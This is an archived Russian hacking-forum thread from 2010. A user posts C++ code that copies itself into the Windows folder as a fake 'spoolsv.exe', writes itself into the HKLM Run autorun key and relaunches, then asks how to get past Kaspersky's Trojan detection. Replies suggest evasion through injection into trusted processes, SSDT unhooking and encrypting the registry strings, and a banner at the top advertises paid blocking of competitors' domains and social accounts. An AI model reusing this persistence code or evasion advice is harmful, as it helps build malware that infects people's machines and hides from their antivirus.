УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Программирование > С/С++, C#, Delphi, .NET, Asm
Как спопировать файл С++ с обходом kAV

Опции темы

Поиск в этой теме

Опции просмотра

Как спопировать файл С++ с обходом kAV

22.02.2010, 13:09

agrofyl2

Познающий

Регистрация: 25.04.2008

Сообщений: 51

Провел на форуме:
146826

Репутация: 17

Как спопировать файл С++ с обходом kAV

Пытаюсь скопировать файлик в папку винды, прописать его в реестр и запустить

Код:

void OnStart() {
   //Получаем путь к своей программе
  wchar_t path[1025]=L"";
  GetModuleFileNameW(NULL, path, 1024);
  
  //Получаем путь для копирования
  wchar_t copy2path[1025]=L"";
  GetWindowsDirectoryW(copy2path, 1024);
  wcscat(copy2path, L"\\spoolsv.exe");
  
  //Сравниваем пути
  if(wcsicmp(path, copy2path)==0) return;
  
  //Либо 1) Еще не скопированы в систему
  //2) Скопированы, но запущено вторично из др. источника
	
  //Если не удалось скопироваться - значит уже скопированы/неудачно скопированы - выходим
  if(!CopyFileW(path, copy2path, 1)) {
    MessageBox(0, "Cant copy", "", 0);
    exit(0);
  }

  //Если скопированы удачно - добавляемся в реестр
  else { 
    HKEY key;//Add In Autorun
    DWORD action;
    if(ERROR_SUCCESS==RegCreateKeyEx(HKEY_LOCAL_MACHINE, __T("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"), 0, NULL,  REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, &action))
    {
      RegSetValueExW(key, L"spoolsv", 0, REG_SZ, (LPBYTE)copy2path, lstrlenW(copy2path)*2+1);
      RegCloseKey(key);	
      
      //Добавлено удачно - запускаем программу, а сами выходим
      char forexec[1025]="";
      wcstombs(forexec, copy2path, 1024);
      
      STARTUPINFO si; PROCESS_INFORMATION pi; GetStartupInfo(&si);
      
      if(!CreateProcess(forexec, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
      WinExec(forexec, 0);
      exit(0);
     }
    exit(0);
  }
}

Но касперский пишет: "поведение, похожее на Trojan Generic"
Файл скопирован и добавлен в реестр(непонятно почему), но повторно не запускается(до CreateProcess выполнение не доходит)
Методом исключения было установлено, что антивирус реагирует на строчку CopyFileW

В принципе пишу программу-шутку и универсальность не нужна. Скопировать файл через коммандную строку чтоли?

22.02.2010, 17:11

Hiro Protagonist

Участник форума

Регистрация: 26.08.2009

Сообщений: 133

Провел на форуме:
193434

Репутация: 79

Отправить сообщение для Hiro Protagonist с помощью ICQ

плять, проактивка же работает. Ищи возможность внедрения в доверенные процессы и уже из них копируй.

22.02.2010, 20:03

slesh

Reservists Of Antichat - Level 6

Регистрация: 05.03.2007

Сообщений: 1,985

Провел на форуме:
3288241

Репутация: 3349

Отправить сообщение для slesh с помощью ICQ

Тут побольшей части ругается не на копирование, а на прописание в реестре в секции автозагрузки. И от этого тяжко уйти, если не знаешь приват методов )

22.02.2010, 21:11

crypt0n

Новичок

Регистрация: 20.02.2010

Сообщений: 11

Провел на форуме:
92082

Репутация: 2

ssdt unhook ( NtCreateFile) ?

23.02.2010, 00:49

0verbreaK

Постоянный

Регистрация: 30.04.2008

Сообщений: 323

Провел на форуме:
379101

Репутация: 136

>>ssdt unhook ( NtCreateFile) ?

Какбэ помягче выразится - чушь предлагаете!

23.02.2010, 02:09

desTiny

Reservists Of Antichat - Level 6

Регистрация: 04.02.2007

Сообщений: 1,152

Провел на форуме:
3008839

Репутация: 1502

Цитата:

Сообщение от slesh

вот хитронод ругается на копирование в виндопапку.
Притом он реально различает кодесы, отличающиеся в

Код:

ExpandEnvironmentStrings("%windir%",b, 255); // длины хватает, опасный код детектед!!

Код:

ExpandEnvironmentStrings("%windir%",b, 1); // длины не хватает, код безопасен

, и смешно подвисает на бесконечных циклах

Приват-не приват - достаточно очевидные способы есть, но вот почему-то рассказывать их не хочется.

__________________
Bedankt euch dafür bei euch selbst.

H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ

24.02.2010, 02:17

Fliplab

Участник форума

Регистрация: 29.07.2008

Сообщений: 128

Провел на форуме:
225836

Репутация: 34

Отправить сообщение для Fliplab с помощью ICQ

Поробуй шифровать ключ реестра и где надо расшифровывай.

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Как уничтожить вирус Penetrator?	Aikaram	Статьи	0	14.06.2009 11:18
Как стать хакером!	foreva	Болталка	19	12.12.2007 00:12
FAQ по выделенным серверам (Dedicated Servers)	byte57	Чужие Статьи	4	16.11.2006 22:03

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход